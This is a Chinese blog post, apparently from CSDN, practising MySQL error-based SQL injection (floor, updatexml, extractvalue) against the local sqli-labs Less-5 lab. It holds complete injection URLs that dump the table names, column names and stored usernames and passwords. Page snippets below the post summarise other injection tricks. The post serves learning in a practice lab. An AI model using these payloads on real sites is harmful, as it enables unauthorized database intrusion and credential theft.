sql注入 之 报错注入 练习

最新推荐文章于 2024-04-04 17:00:28 发布
最新推荐文章于 2024-04-04 17:00:28 发布
阅读量298 收藏
点赞数
分类专栏: web 渗透学习 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41619455/article/details/126122343
版权

三种报错注入得方式:

(1). 通过floor报错
and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符

(2). 通过updatexml报错
and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效

(3). 通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。 

测试网站发现 无报错显示 所以尝试 报错注入

使用第二种报错方法

http://127.0.0.1/sqli/Less-5/?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20--+

 爆出数据后,按照前面的爆表 爆列进行

http://127.0.0.1/sqli/Less-5/?id=2' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+

 爆列http://127.0.0.1/sqli/Less-5/?id=2' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

 http://127.0.0.1/sqli/Less-5/?id=2' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,password)),0x7e) from users),0x7e),1) --+

拿到数据得账号密码。

总结

对于不同类型得报错注入,原理是一样得 在playload 出写出查询语句即可

认养一天63头9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
突破SQL注入攻击时输入框长度的限制
谈笑书生'BLOG
04-17 2377
作者:  czy82     前天TK研究的一个网页改COOKIE的小玩意儿给我了一点点灵感昨晚又和adam聊了聊SQL注入,今早上来就写了这篇东东.    xp_cmdshell net user abc def /add这些命令大家想必都用烂了吧,但是在实际的测试中我们常常会遇到这样的情况,服务器的asp脚本没有对用户的输入做限制,但是在网页上通过对输入框设置maxlength属性使我们的
SQL注入报错注入(小白的学习)
lgsyydsa的博客
06-04 391
报错注入适用于无法判断显示位 但页面会根据我们输入错误的SQL语法而报错,所以可以尝试报错注入。作为小白,这里就用ctfhub的题来写点东西,写的不好勿喷。点开题目链接,可以发现只有ID的输入,所以尝试输入数字型和字符型的判断语句,发现?这两个函数都是当第二个参数包含特殊字符时,数据库会报错,并将第二个参数的内容显示在报错内容中,这就是报错注入的原理。结果得到表名flag,news,根据判断,flag八成在flag这张表里。结果发现报错内容中第二个参数中有‘~’,说明方向是对的。别的报错函数一样的道理。
SQL注入(宽字节注入、长字符截断)
qq_28786023的博客
10-05 3049
本文仅记录SQL注入漏洞学习过程中的基本知识。 SQL注入漏洞是完全可以避免的安全问题。从其形成原因来看,就是**用户输入的数据(可能带有恶意)被SQL解释器当作代码执行,**从而获得更多数据库的信息或者获得更高的权限。从原理上来说,SQL注入可以分为两大类,数字型注入;字符串型注入;(《web安全深度剖析 张炳帅》)。 数字型注入 即输入类型为int类型,如ID,年龄,页码等。一般来说,数字型注入只存在于弱类型语句中,如:PHP,ASP,python,而对于C,java等强类型语言则不存在。弱类型语言会自
网安入门08-Sql注入报错注入&宽字节)
m0_61499194的博客
12-25 470
如果数据库使用的的是GBK编码而PHP编码为UTF8就可能出现注入问题,原因是程序员为了防止SQL注入,就会调用几种安全查询函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应用的作用。当某字符的大小为两个字节时,称其字符为宽字节.
登录口SQL注入突破32位限制获取密码
qq_27278819的博客
09-25 282
虽然本文主要讲述了SQL注入,但同时也记录了在测试这个网站时的整体思考方式以及不同测试点的攻击方式。将这种方式记录下来并形成自己在渗透测试中的checklist,可以使渗透流程更加标准化,使整个测试过程更加行云流水得心应手。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **查询方式**: 1. **SELECT查询**:通常用于从数据库中检索数据,例如`select * from news where id=$id`。这里的...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
1. 注入练习11
08-03
注入练习11" 描述的是一个关于SQL注入的安全练习,涉及ASP.NET技术。这个练习中,我们看到一个URL `http://192.168.1.55/see.asp?ID=462&titleID=86` 报出了错误,说明它使用了微软的JET数据库引擎,并且在处理查询...
SXU-网络攻防第六次作业-sql注入进阶
12-27
本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆叠注入和宽字节注入,并给出相应的实践步骤。 首先,我们来看报错注入报错注入是通过触发数据库错误来揭示敏感信息...
SQL注入-报错注入
m0_72125469的博客
11-24 768
SQL注入系列-报错注入
SQL--报错注入学习
最新发布
Z11762的博客
04-04 827
报错注入就是通过一些函数的错误使用后从报错的内容中获取信息,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误,那么就存在报错注入的可能性。(1).BigInt数据类型溢出。
mysql报错注入ctf_CTF练习平台——报错注入
weixin_42119989的博客
02-18 223
TIM截图20180208125700.png这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符这里我通过extractvalue报错,注入语句如下http://103.238.227.13:10088/?id=1%0Aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))成功报错接下...
SQL靶场练习之二(空格绕过、报错注入
Lorezon的博客
01-16 728
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
031 突破SQL注入限制的一点想法
hackdoors的博客
10-06 448
突破SQL注入限制的一点想法 2007-08-21 08:18:20| 分类: 思绪燃星火——技 题记:自己的一点想法,再加上网上搜集的一些资料,应该是很有价值的。 [转载请注明版权] 黑客反病毒论坛 http://bbs.hackav.com 近来技术没啥长进,竟弄些没用的了,想想真是可惜啊…… 突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是...
SQL注入基础总结
IerkeU的博客
12-09 4215
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入带来的危害主要有如
GET报错注入Sqli-labs第一题详解)
Hardworking666的博客
01-06 1981
文章目录一、找注入点二、order by判断列数三、union联合注入,判断数据显示点四、爆库、爆表 一、找注入点 单引号注入题目,在参数后面加一个单引号: /?id=1' 数据库报错,单引号匹配出错,即添加的单引号成功被数据库解析,可以通过闭合id参数,插入构造的sql语句实施攻击。 二、order by判断列数 order by 1、2、3都尝试,无报错。 /?id=1' order by 4 --+ 用4的话报错:Unknown column ‘4’ in ‘order clause’ 证明..
一道简单的sql注入题目
weixin_44215027的博客
11-05 1948
一道简单的sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
实验吧 加了料的报错注入 再见报错注入
Assassin
01-31 1973
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users
SQL注入攻击详解与防御策略
"该PDF文件主要讲解了SQL注入的基础知识,包括原理、分类、注入技巧以及在MySQL中的应用,还提供了靶场练习,涵盖了数字型、字符型、搜索型和盲注型注入的实战步骤。" SQL注入是一种常见的网络安全漏洞,攻击者通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值